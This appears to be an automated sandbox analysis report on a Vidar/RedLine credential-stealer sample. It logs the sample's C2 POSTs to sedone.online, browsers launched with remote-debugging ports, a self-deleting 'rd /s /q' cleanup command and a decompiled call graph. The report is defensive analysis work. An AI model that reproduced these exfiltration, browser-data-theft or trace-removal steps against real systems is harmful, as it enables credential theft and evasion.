                                                                                                                                                                                                                                                2024-12-16 14:40:50 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 46 4b 58 42 41 31 4e 37 51 49 45 55 41 41 41 31 4e 47 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 46 4b 58 42 41 31 4e 37 51 49 45 55 41 41 41 31 4e 47 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 46 4b 58 42 41 31 4e 37 51 49 45 55 41 41 41 31 4e 47 56 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------FKXBA1N7QIEUAAA1NGVKContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------FKXBA1N7QIEUAAA1NGVKContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------FKXBA1N7QIEUAAA1NGVKCont
                                                                                                                                                                                                                                                2024-12-16 14:40:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:50 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.7 | 50040 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                2024-12-16 14:40:52 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----MOP8GVS26F3E37GL6PHV
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 14:40:52 UTC | 331 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4d 4f 50 38 47 56 53 32 36 46 33 45 33 37 47 4c 36 50 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4d 4f 50 38 47 56 53 32 36 46 33 45 33 37 47 4c 36 50 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4d 4f 50 38 47 56 53 32 36 46 33 45 33 37 47 4c 36 50 48 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------MOP8GVS26F3E37GL6PHVContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------MOP8GVS26F3E37GL6PHVContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------MOP8GVS26F3E37GL6PHVCont
2024-12-16 14:40:53 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:53 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
2024-12-16 14:40:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0



                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                Start time:09:39:24
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\dZKPE9gotO.exe"
                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                File size:321'024 bytes
                                                                                                                                                                                                                                                MD5 hash:876A365BDA09B9EF39605E375D677F0A
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2205131048.0000000000A29000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                                Start time:09:39:44
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                                Start time:11:07:13
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2844 --field-trial-handle=2300,i,8023448813731883458,15502527329942083747,262144 /prefetch:8
                                                                                                                                                                                                                                                Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                                Start time:11:07:25
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                                Start time:11:07:26
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2716 --field-trial-handle=2484,i,735169175553116458,11203760071663771088,262144 /prefetch:3
                                                                                                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                                Start time:11:07:26
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                                Start time:11:07:26
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:3
                                                                                                                                                                                                                                                Imagebase:0x7ff6bd830000
                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                                Start time:11:07:30
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6260 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8
                                                                                                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                                Start time:11:07:30
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6552 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8
                                                                                                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                                Start time:11:08:19
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\PP89HLXLFCBI" & exit
                                                                                                                                                                                                                                                Imagebase:0x410000
                                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                                Start time:11:08:19
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                                Start time:11:08:19
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:timeout /t 10
                                                                                                                                                                                                                                                Imagebase:0xf80000
                                                                                                                                                                                                                                                File size:25'088 bytes
                                                                                                                                                                                                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                                                                Start time:11:08:19
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 3064
                                                                                                                                                                                                                                                Imagebase:0x660000
                                                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                                                                Start time:11:08:26
                                                                                                                                                                                                                                                Start date:16/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6704 --field-trial-handle=1968,i,4773642217830312102,9382657893899972247,262144 /prefetch:8
                                                                                                                                                                                                                                                Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:false


                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:14.1%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:2.9%
                                                                                                                                                                                                                                                  Signature Coverage:35.3%
                                                                                                                                                                                                                                                  Total number of Nodes:1610
                                                                                                                                                                                                                                                  Total number of Limit Nodes:37
14990->14991 14992 413860 3 API calls 14991->14992 14993 406fbb 14992->14993 14994 4137c0 lstrcpyA 14993->14994 14995 406fc3 14994->14995 14996 413860 3 API calls 14995->14996 14997 406fd8 14996->14997 14998 4137c0 lstrcpyA 14997->14998 14999 406fe0 14998->14999 15000 413860 3 API calls 14999->15000 15001 407015 15000->15001 15002 4137c0 lstrcpyA 15001->15002 15003 40701d 15002->15003 15004 413860 3 API calls 15003->15004 15005 407054 15004->15005 15006 4137c0 lstrcpyA 15005->15006 15007 40705c 15006->15007 15008 413806 2 API calls 15007->15008 15009 40706f 15008->15009 15010 4137c0 lstrcpyA 15009->15010 15011 407077 15010->15011 15012 413860 3 API calls 15011->15012 15013 40708c 15012->15013 15014 4137c0 lstrcpyA 15013->15014 15015 407094 15014->15015 15016 413860 3 API calls 15015->15016 15017 4070a8 15016->15017 15018 4137c0 lstrcpyA 15017->15018 15019 4070b0 15018->15019 15020 413806 2 API calls 15019->15020 15021 4070c3 15020->15021 15022 4137c0 lstrcpyA 15021->15022 15023 4070cb 15022->15023 15024 413860 3 API calls 15023->15024 15025 4070db 15024->15025 15026 4137c0 lstrcpyA 15025->15026 15027 4070e3 15026->15027 15028 413860 3 API calls 15027->15028 15029 4070f8 15028->15029 15030 4137c0 lstrcpyA 15029->15030 15031 407102 15030->15031 15032 413860 3 API calls 15031->15032 15033 40713d 15032->15033 15034 4137c0 lstrcpyA 15033->15034 15035 407145 15034->15035 15036 413860 3 API calls 15035->15036 15037 407159 15036->15037 15038 4137c0 lstrcpyA 15037->15038 15039 407161 15038->15039 15040 413806 2 API calls 15039->15040 15041 407174 15040->15041 15042 4137c0 lstrcpyA 15041->15042 15043 40717c 15042->15043 15044 41370e lstrcpyA 15043->15044 15045 407192 15044->15045 15046 413806 2 API calls 15045->15046 15047 4071a1 15046->15047 15048 413806 2 API calls 15047->15048 15049 4071ad 15048->15049 15050 4137c0 lstrcpyA 15049->15050 15053 4071b5 15050->15053 15051 4071dd lstrlenA 15051->15053 15052 4071fa lstrlenA 15052->15053 15053->15051 15053->15052 15054 407272 
InternetReadFile 15053->15054 15055 407217 Sleep 15053->15055 15056 4072da InternetCloseHandle 15054->15056 15057 40728f 15054->15057 15058 407235 15055->15058 15059 407228 15055->15059 15060 4072eb 15056->15060 15057->15056 15065 407296 15057->15065 15061 41370e lstrcpyA 15058->15061 15059->15053 15059->15058 15060->14981 15063 407265 15061->15063 15062 413860 3 API calls 15062->15065 15063->14959 15064 4137c0 lstrcpyA 15064->15065 15065->15056 15065->15062 15065->15064 15066 4072bc InternetReadFile 15065->15066 15066->15056 15066->15065 15067 409ef0 15068 409f02 15067->15068 15165 412b5a 15068->15165 15071 409f59 15170 412672 15071->15170 15072 409f45 memmove 15072->15071 15075 409fac memmove 15076 409fc0 15075->15076 15076->15076 15077 412b5a 12 API calls 15076->15077 15078 40a047 15077->15078 15079 40a08c 15078->15079 15080 40a075 memmove 15078->15080 15081 412672 10 API calls 15079->15081 15080->15079 15082 40a0ca 15081->15082 15083 40a0f1 memmove 15082->15083 15085 40a101 15082->15085 15083->15085 15084 412b5a 12 API calls 15086 40a18e 15084->15086 15085->15084 15085->15085 15087 40a1bd 15086->15087 15088 40a1a6 memmove 15086->15088 15182 409942 15087->15182 15088->15087 15091 409942 2 API calls 15092 40a204 15091->15092 15093 409942 2 API calls 15092->15093 15094 40a20d 15093->15094 15095 409942 2 API calls 15094->15095 15096 40a216 15095->15096 15097 409942 2 API calls 15096->15097 15098 40a21f 15097->15098 15099 409942 2 API calls 15098->15099 15100 40a228 15099->15100 15101 409942 2 API calls 15100->15101 15102 40a231 send 15101->15102 15104 40a343 closesocket WSACleanup 15102->15104 15105 40a265 recv 15102->15105 15107 41232c 13 API calls 15104->15107 15105->15104 15106 40a283 15105->15106 15186 41232c 15106->15186 15108 40a374 15107->15108 15110 409942 2 API calls 15108->15110 15112 40a770 15110->15112 15115 409942 2 API calls 15112->15115 15118 40a77c 15115->15118 15116 40a379 15120 40a381 15116->15120 15121 40a3ca 15116->15121 15117 40a32b 15119 
412b82 10 API calls 15117->15119 15122 40a33e 15119->15122 15124 412b82 10 API calls 15120->15124 15123 412b82 10 API calls 15121->15123 15127 409882 11 API calls 15122->15127 15125 40a3d9 15123->15125 15126 40a392 15124->15126 15125->15122 15130 412b82 10 API calls 15125->15130 15128 412b82 10 API calls 15126->15128 15137 40a3bf 15127->15137 15129 40a3a5 15128->15129 15131 412b82 10 API calls 15129->15131 15130->15125 15133 40a3b1 15131->15133 15132 40a456 send 15135 40a725 closesocket WSACleanup 15132->15135 15162 40a48f 15132->15162 15199 409882 15133->15199 15139 40a723 15135->15139 15140 41232c 13 API calls 15135->15140 15137->15132 15141 412b82 10 API calls 15137->15141 15138 40a4b6 recv 15142 40a67f 15138->15142 15138->15162 15143 409942 2 API calls 15139->15143 15140->15139 15141->15137 15146 412b82 10 API calls 15142->15146 15144 40a758 15143->15144 15148 409942 2 API calls 15144->15148 15147 40a6a3 15146->15147 15149 412b82 10 API calls 15147->15149 15148->15108 15150 40a6ac send closesocket WSACleanup 15149->15150 15152 40a6f5 15150->15152 15153 40a708 15150->15153 15241 412354 15152->15241 15155 409942 2 API calls 15153->15155 15156 40a711 15155->15156 15157 409942 2 API calls 15156->15157 15158 40a71a 15157->15158 15160 412bf2 2 API calls 15158->15160 15160->15139 15162->15138 15162->15142 15163 40a631 memmove 15162->15163 15211 412c14 15162->15211 15224 412d80 15162->15224 15229 412dc2 15162->15229 15237 412bf2 15162->15237 15163->15162 15166 412b72 15165->15166 15167 412b67 strlen 15165->15167 15168 409882 11 API calls 15166->15168 15167->15166 15169 409f20 15168->15169 15169->15071 15169->15072 15171 412683 15170->15171 15172 4126ed 15170->15172 15174 4126f4 15171->15174 15175 412699 15171->15175 15260 412528 15172->15260 15270 412538 15174->15270 15181 409f91 15175->15181 15250 412464 15175->15250 15180 4126c5 memcpy 15180->15181 15181->15075 15181->15076 15183 409958 15182->15183 15184 40994d 15182->15184 15183->15091 15185 4122f4 2 API calls 
15184->15185 15185->15183 15187 412344 15186->15187 15188 412339 strlen 15186->15188 15189 412354 12 API calls 15187->15189 15188->15187 15190 40a2ea rand rand rand rand 15189->15190 15191 412b82 15190->15191 15192 412b96 15191->15192 15193 412beb 15191->15193 15195 412464 9 API calls 15192->15195 15197 40a323 15192->15197 15194 412538 8 API calls 15193->15194 15196 412ba6 15195->15196 15196->15197 15198 412bc4 memset 15196->15198 15197->15116 15197->15117 15198->15197 15200 4098ba 15199->15200 15201 409894 15199->15201 15202 4098c5 15200->15202 15203 40990b 15200->15203 15201->15200 15204 4098ac 15201->15204 15205 4098b8 15202->15205 15208 412464 9 API calls 15202->15208 15206 412538 8 API calls 15203->15206 15207 412672 10 API calls 15204->15207 15205->15137 15207->15205 15209 4098d5 15208->15209 15209->15205 15210 4098e3 memcpy 15209->15210 15210->15205 15212 412c2b 15211->15212 15217 412cc5 15211->15217 15213 412c43 15212->15213 15214 412cd9 memmove 15212->15214 15215 412d68 15213->15215 15216 412c4f 15213->15216 15214->15217 15333 412d70 15215->15333 15218 4125e0 3 API calls 15216->15218 15217->15162 15220 412c69 memmove memmove memmove 15218->15220 15220->15217 15222 412cb7 15220->15222 15223 4122f4 2 API calls 15222->15223 15223->15217 15225 412dbb 15224->15225 15226 412d9a 15224->15226 15225->15162 15227 4125e0 3 API calls 15226->15227 15228 412da2 memmove 15227->15228 15228->15225 15230 412df3 15229->15230 15231 412dfe 15229->15231 15232 412354 12 API calls 15230->15232 15337 4127e8 15231->15337 15232->15231 15235 409942 2 API calls 15236 412e23 15235->15236 15236->15162 15238 412c07 15237->15238 15239 412bf8 15237->15239 15238->15162 15240 4122f4 2 API calls 15239->15240 15240->15238 15242 412365 15241->15242 15243 41238a 15241->15243 15242->15243 15246 41237c 15242->15246 15244 412464 9 API calls 15243->15244 15245 412394 15244->15245 15248 412388 15245->15248 15249 4123a6 memcpy 15245->15249 15373 4123ca 15246->15373 15248->15153 15249->15248 15251 
4124be 15250->15251 15252 41246e 15250->15252 15255 412538 8 API calls 15251->15255 15253 412480 15252->15253 15254 412475 15252->15254 15258 41247e 15253->15258 15284 4122aa 15253->15284 15278 412548 15254->15278 15257 4124c3 15255->15257 15258->15180 15258->15181 15261 41252d 15260->15261 15303 420e1b 15261->15303 15263 412537 15310 420dfb 15263->15310 15271 41253d 15270->15271 15272 420dfb 4 API calls 15271->15272 15273 412547 15272->15273 15274 4125e0 3 API calls 15273->15274 15275 412594 15274->15275 15276 4125c6 15275->15276 15277 4122f4 2 API calls 15275->15277 15277->15276 15279 412589 15278->15279 15290 4125e0 15279->15290 15281 412594 15282 4125c6 15281->15282 15298 4122f4 15281->15298 15282->15258 15285 4122e0 15284->15285 15286 4122ba 15284->15286 15285->15258 15286->15285 15287 4122d6 15286->15287 15288 4122c8 memcpy 15286->15288 15289 4122f4 2 API calls 15287->15289 15288->15287 15289->15285 15291 4125e8 15290->15291 15292 41260e 15290->15292 15293 412613 ??2@YAPAXI 15291->15293 15294 4125ef 15291->15294 15292->15281 15293->15281 15295 4125f4 ??2@YAPAXI 15294->15295 15296 41261f 15294->15296 15295->15281 15297 420dde Concurrency::cancel_current_task RaiseException 15296->15297 15297->15296 15299 412302 15298->15299 15300 41231b ??3@YAXPAX 15298->15300 15301 412327 _invalid_parameter_noinfo_noreturn 15299->15301 15302 412319 15299->15302 15300->15282 15302->15300 15315 420e92 15303->15315 15306 420f5e Concurrency::cancel_current_task RaiseException 15307 420e3a 15306->15307 15318 420d34 15307->15318 15330 420e56 15310->15330 15313 420f5e Concurrency::cancel_current_task RaiseException 15314 420e1a 15313->15314 15321 420cfd 15315->15321 15319 420edc ___std_exception_copy 3 API calls 15318->15319 15320 420d57 15319->15320 15320->15263 15324 420edc 15321->15324 15325 420d29 15324->15325 15326 420ee9 15324->15326 15325->15306 15326->15325 15327 420ef9 malloc 15326->15327 15328 420f26 free 15327->15328 15329 420f0d strcpy_s 15327->15329 15328->15325 
